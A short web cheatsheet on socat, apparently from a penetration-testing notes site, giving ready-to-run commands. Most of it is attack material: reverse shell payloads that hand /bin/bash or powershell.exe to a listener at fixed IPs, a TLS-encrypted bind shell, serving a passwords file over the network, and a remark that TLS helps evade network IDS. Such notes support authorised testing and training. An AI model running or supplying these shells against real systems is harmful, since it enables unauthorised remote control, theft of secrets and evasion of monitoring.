Skip to content

Socat

Cheatsheet
Snippet
Linux

Socat establishes two bidirectional byte streams and transfers data between them

Note

Socat uses ip:port notation

General usage 

socat <SRC> <DST>

Example for stdin/stdout to webserver 

socat - TCP4:192.168.1.80:80

File transfer 

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

Shell listener 

socat -d -d TCP4-LISTEN:443 STDOUT

Shell payload 

socat TCP4:10.11.0.22:443 EXEC:/bin/bash

TLS Shell

Socat can use TLS to help evade network IDS.

Generate cert 

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
Enter random data for the cert 
cat bind_shell.crt bind_shell.key > bind_shell.pem

Bind Shell

Payload 

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Connect with 

socat - OPENSSL:10.1.2.3:443,verify=0

Reverse Shell

Listen with 

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0 -

Payload 

socat OPENSSL:192.168.119.154:443,verify=0 EXEC:'powershell.exe',pipes

Last update: 2021-09-01